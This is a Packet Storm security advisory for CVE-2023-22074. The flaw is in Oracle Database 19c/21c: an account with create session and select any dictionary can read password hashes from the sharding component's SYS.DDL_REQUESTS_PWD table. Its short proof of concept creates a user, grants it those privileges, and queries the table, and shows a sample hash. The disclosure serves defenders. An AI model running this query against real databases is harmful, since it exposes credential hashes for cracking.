what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle 19c / 21c Sharding Component Password Hash Exposure

Oracle 19c / 21c Sharding Component Password Hash Exposure
Posted Oct 26, 2023
Authored by Emad Al-Mousa

Oracle database versions 19.3 through 19.20 and 21.3 through 21.11 have an issue where an account with create session and select any dictionary can view password hashes stored in a system table that is part of a sharding component setup.

tags | exploit, info disclosure
advisories | CVE-2023-22074
SHA-256 | d2f153475e1ccb9fba7a3c56502ebe8182c7fe13f5f32cca180c60ebe9c205c7

Oracle 19c / 21c Sharding Component Password Hash Exposure

Change Mirror Download
Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11]
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
CVE Reference: CVE-2023-22074
Base Score: 2.4
Author of Advisory: Emad Al-Mousa


*****************************************
Vulnerability Details:

Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.


*****************************************
Proof of Concept (PoC):

I will create an account called “jim” in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:

SQL> alter session set container=ORCLPDB1;

Session altered.

SQL> create user jim identified by jim123;

User created.

SQL> grant create session,select any dictionary to jim;

Grant succeeded.

I will now connect using database account “jim” and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:

sqlplus "jim/jim123"@ORCLPDB1

SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;

DDL_NUM PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
123 445
E494684108560FFEF1C17CDE72F36A1A




*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close